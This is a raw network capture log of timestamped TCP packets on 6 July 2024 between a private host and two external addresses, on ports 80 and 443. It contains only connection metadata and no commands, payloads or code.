Jul 6, 2024 13:27:18.720024109 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.720124960 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.720815897 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.720834970 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.720846891 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.720885992 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.738477945 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738488913 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738501072 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738535881 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.738557100 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738559008 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.738573074 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738584995 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738611937 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.738791943 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738840103 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738851070 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.738867998 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.738888025 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.808304071 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808316946 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808327913 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808367014 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.808470964 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808490038 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808502913 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808531046 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.808562040 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.808639050 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808696985 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808708906 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.808747053 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.809026957 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809039116 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809050083 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809078932 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.809109926 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.809535027 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809617996 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809628963 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809668064 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.809710026 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809721947 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809732914 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.809768915 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.809783936 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.810417891 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.810451984 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.810463905 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.810494900 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.810823917 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.810836077 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.810848951 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.810868979 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.810899019 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.811395884 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.811713934 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.811758995 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.811758995 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.826896906 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.826914072 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.826925039 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.826956034 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.826977015 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.827003956 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827014923 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827054024 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.827156067 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827426910 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827461004 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827471018 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827512026 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.827544928 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827555895 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827565908 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827588081 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.827810049 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827857971 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.827864885 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827876091 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.827914953 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.827939034 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.828049898 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.828061104 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.828087091 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.877451897 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.897074938 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897166967 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897222996 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897234917 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897272110 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.897303104 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897397041 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897408962 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897420883 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897439957 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.897459030 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897469997 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.897545099 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897562027 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897588015 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.897696018 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897706985 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897718906 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897733927 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897735119 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.897752047 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.897790909 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.897831917 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.898294926 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.898351908 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.898363113 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.898396015 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.898479939 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.898490906 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.898502111 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.898514986 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.898518085 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.898531914 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.898596048 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.898701906 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.899220943 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.899276018 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.899286985 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.899311066 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.899399042 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.899410009 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.899420023 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.899432898 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.899445057 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.899477005 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.899542093 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.899596930 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.900080919 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.900141954 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.900152922 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.900183916 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.900188923 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.900228977 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.915720940 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.915734053 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.915775061 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.915873051 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.915885925 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.915895939 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.915906906 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.915919065 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.915925026 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.915939093 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.915947914 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.915987015 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.916062117 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916074991 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916132927 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.916145086 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916157007 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916198969 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.916229963 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916241884 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916277885 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.916356087 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916368008 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916379929 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916392088 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916404009 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.916404009 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916428089 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.916613102 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916625023 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916635990 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916649103 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916661024 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.916692019 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.916940928 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916951895 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916964054 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.916985035 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.917012930 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.917089939 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.917100906 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.917113066 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.917124033 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.917143106 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.917160988 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.917231083 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.917243004 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.917253971 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.917265892 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.917285919 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.917318106 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.917360067 CEST	49747	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.922127962 CEST	80	49747	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.957360983 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.962229013 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:18.962306023 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.962368965 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:18.967211962 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.336707115 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:19.336725950 CEST	443	49751	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:19.336792946 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:19.348923922 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:19.348938942 CEST	443	49751	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:19.564568043 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564651966 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564661980 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564717054 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564728022 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564738035 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564749002 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564750910 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.564762115 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564769030 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.564785004 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.564807892 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.564816952 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564829111 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.564865112 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.569591045 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.569647074 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.569658995 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.569710970 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.569721937 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.569742918 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.569789886 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.661107063 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661117077 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661128044 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661140919 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661175013 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.661231041 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.661308050 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661329031 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661339045 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661371946 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.661467075 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661478996 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661493063 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.661509991 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.661530972 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.662285089 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.662333965 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.662345886 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.662399054 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.662527084 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.662538052 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.662549019 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.662574053 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.662602901 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.663305044 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.663371086 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.663383961 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.663414955 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.663428068 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.663453102 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.663465023 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.663717031 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.663760900 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.663772106 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.663815022 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.663841009 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.705769062 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.753467083 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753526926 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753540039 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753581047 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753592968 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753607035 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.753648996 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.753715038 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753726959 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753742933 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753765106 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.753791094 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753796101 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.753823996 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753844976 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.753890991 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.753998041 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754009962 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754024029 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754045963 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.754066944 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.754504919 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754575968 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754586935 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754632950 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754635096 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.754645109 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754657030 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754673958 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.754702091 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.754775047 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754789114 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.754832983 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.755381107 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.755429983 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.755441904 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.755531073 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.755557060 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.755570889 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.755582094 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.755594015 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.755605936 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.755618095 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.755676031 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756295919 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756315947 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756328106 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756347895 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.756364107 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.756437063 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756448984 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756458998 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756503105 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.756555080 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756567955 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.756607056 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.757196903 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.757251024 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.757261992 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.757298946 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.757380009 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.757390022 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.757400990 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.757414103 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.757426023 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.757440090 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.757509947 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.757842064 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.793453932 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.793477058 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.793486118 CEST	80	49750	192.3.140.185	192.168.2.4
